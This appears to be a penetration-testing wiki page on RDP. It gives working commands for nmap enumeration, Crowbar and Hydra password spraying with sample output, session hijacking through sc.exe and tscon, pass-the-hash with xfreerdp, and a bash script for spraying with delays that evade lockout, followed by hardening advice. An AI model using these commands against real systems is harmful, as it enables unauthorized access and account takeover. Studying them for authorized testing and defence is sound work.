RDP
RDP Services
Remote Desktop Protocol (RDP) is a proprietary protocol developed by Microsoft that provides a graphical interface for connecting to another computer over a network connection. It's widely used by system administrators and end users for remote access to Windows systems, making it a common target during penetration testing.
Protocol Overview
RDP operates on TCP port 3389 by default, though this can be changed in the registry. The protocol enables:
Full graphical access to remote systems
File transfer capabilities
Audio and video redirection
Clipboard sharing
Printer redirection
Enumeration Techniques
Basic Port Scanning
# Simple port scan
nmap -Pn -p3389 192.168.2.143
# Service version detection
nmap -Pn -p3389 -sV 192.168.2.143Example output:
PORT STATE SERVICE
3389/tcp open ms-wbt-serverBanner Grabbing
# Using netcat
nc -nv 192.168.2.143 3389This may not provide a traditional text banner but can confirm the service is running.
RDP Security Assessment
# Nmap script scan
nmap --script "rdp-*" -p 3389 -v 192.168.2.143Nmap has several RDP-specific scripts that can:
Check supported security protocols
Test for known vulnerabilities
Verify NLA (Network Level Authentication) settings
Common Misconfigurations
Authentication Issues
RDP services can be vulnerable to authentication-related issues:
Weak Credentials: Default or easily guessed passwords
No Account Lockout Policy: Allows unlimited password attempts
NLA Disabled: Enables pre-authentication vulnerabilities
Password Spraying
When an account lockout policy isn't configured or is too lenient, password spraying can be effective:
# Using Crowbar
crowbar -b rdp -s 192.168.220.142/32 -U users.txt -c 'password123'Example output:
2022-04-07 15:35:50 START
2022-04-07 15:35:50 Crowbar v0.4.1
2022-04-07 15:35:50 Trying 192.168.220.142:3389
2022-04-07 15:35:52 RDP-SUCCESS : 192.168.220.142:3389 - administrator:password123
2022-04-07 15:35:52 STOPUsing Hydra
# Password spraying with Hydra
hydra -L usernames.txt -p 'password123' 192.168.2.143 rdpExample output:
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-08-25 21:44:52
[WARNING] rdp servers often don't like many connections, use -t 1 or -t 4 to reduce the number of parallel connections and -W 1 or -W 3 to wait between connection to allow the server to recover
[INFO] Reduced number of tasks to 4 (rdp does not like many parallel connections)
[WARNING] the rdp module is experimental. Please test, report - and if possible, fix.
[DATA] max 4 tasks per 1 server, overall 4 tasks, 8 login tries (l:2/p:4), ~2 tries per task
[DATA] attacking rdp://192.168.2.147:3389/
[3389][rdp] host: 192.168.2.143 login: administrator password: password123
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-08-25 21:44:56Accessing RDP Services
Using rdesktop (Linux)
rdesktop -u administrator -p 'password123' 192.168.2.143Using xfreerdp (Linux)
xfreerdp /u:administrator /p:'password123' /v:192.168.2.143Using mstsc (Windows)
On Windows, you can use the built-in Remote Desktop Connection (mstsc.exe):
Press Win + R
Type
mstscEnter the target IP and credentials
Advanced Attack Techniques
RDP Session Hijacking
With local administrator access on a system, you can hijack other users' RDP sessions:
First, identify active sessions:
query userExample output:
USERNAME SESSIONNAME ID STATE IDLE TIME LOGON TIME
>juurena rdp-tcp#13 1 Active 7 8/25/2021 1:23 AM
lewen rdp-tcp#14 2 Active * 8/25/2021 1:28 AMCreate a service to execute the hijack using
tscon:
sc.exe create sessionhijack binpath= "cmd.exe /k tscon 2 /dest:rdp-tcp#13"Start the service:
net start sessionhijackThis technique works by redirecting the target session to your current session, effectively taking it over without needing the user's credentials.
RDP Pass-the-Hash (PtH)
On systems with Restricted Admin Mode enabled, you can use NTLM hashes instead of cleartext passwords:
First, ensure Restricted Admin Mode is enabled on the target:
reg add HKLM\System\CurrentControlSet\Control\Lsa /t REG_DWORD /v DisableRestrictedAdmin /d 0x0 /fUse xfreerdp with the hash:
xfreerdp /v:192.168.220.152 /u:lewen /pth:300FF5E89EF33F83A8146C10F5AB9BB9If the hash is valid and Restricted Admin Mode is enabled, you'll be logged in without requiring the cleartext password.
Known RDP Vulnerabilities
CVE-2019-0708 (BlueKeep)
A critical remote code execution vulnerability in Remote Desktop Services:
Affects Windows 7, Windows Server 2008 R2, and earlier versions
Pre-authentication and requires no user interaction
Can potentially allow wormable malware
Detection:
nmap -p 3389 --script rdp-vuln-ms19-0708 192.168.2.143CVE-2012-0002 (MS12-020)
A vulnerability in Remote Desktop Protocol that could allow remote code execution:
Affects multiple versions of Microsoft Windows
Exploitable over the RDP protocol
Can cause denial of service
CVE-2020-0609/CVE-2020-0610
Remote code execution vulnerabilities in Windows Remote Desktop Gateway:
Affects Windows Server 2012, 2012 R2, 2016, 2019
Pre-authentication and requires no user interaction
Enables arbitrary code execution on the gateway server
Defensive Measures
When testing RDP services, consider these security recommendations:
RDP Hardening
Enable Network Level Authentication (NLA)
Requires user authentication before establishing a full RDP connection
Registry path:
HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-TcpSetting:
SecurityLayer= 2,UserAuthentication= 1
Implement Account Lockout Policies
Prevents brute force attacks
Recommended: 5-10 invalid attempts before lockout
Use Strong Passwords
Complex passwords for all accounts with RDP access
Consider password management solutions
Restrict RDP Access
Limit RDP to specific IP addresses using Windows Firewall
Use VPN for remote access before allowing RDP connections
Disable RDP When Not Needed
Registry path:
HKLM\System\CurrentControlSet\Control\Terminal ServerSetting:
fDenyTSConnections= 1
Use TLS 1.2 or Higher
Provides stronger encryption
Registry path:
HKLM\System\CurrentControlSet\Control\SecurityProviders\SCHANNEL\Protocols
Implement Multi-Factor Authentication
Adds an additional layer of security
Consider solutions like Duo Security, Azure MFA, etc.
RDP Penetration Testing Methodology
When testing RDP services, follow these steps:
Discovery: Identify systems with RDP enabled
Enumeration: Determine RDP version and security settings
Authentication Testing: Test for weak credentials and password policies
Security Configuration Assessment: Check NLA, encryption level, etc.
Vulnerability Testing: Test for known RDP vulnerabilities
Post-Authentication Testing: Attempt session hijacking, escalation, etc.
Reporting: Document findings and suggest mitigation measures
Practical Testing Scripts
Automated RDP Scanning Script
#!/bin/bash
# Simple RDP scanner
for ip in $(seq 1 254); do
host="192.168.1.$ip"
(nmap -p 3389 -T4 --open $host > /dev/null && echo "RDP open on $host") &
done
waitPassword Spraying Wrapper
#!/bin/bash
# RDP password spraying with delays to avoid lockout
TARGET=$1
USERLIST=$2
PASSWORD=$3
DELAY=$4 # Seconds between attempts
for user in $(cat $USERLIST); do
echo "Trying user: $user"
xfreerdp /v:$TARGET /u:$user /p:$PASSWORD /cert-ignore +auth-only 2>&1 | grep -v "CERTIFICATE"
sleep $DELAY
doneRDP Client Security Considerations
When using RDP clients during penetration testing, consider:
Clipboard Sharing: Disable if not needed to prevent data leakage
Drive Redirection: Disable to prevent accidental file exposure
Client-Side Vulnerabilities: Keep RDP clients updated
Session Recording: Consider recording sessions for documentation
Network Isolation: Use dedicated networks for penetration testing
By understanding RDP services and their security implications, penetration testers can effectively identify vulnerabilities and suggest appropriate security improvements for remote access infrastructure.
Last updated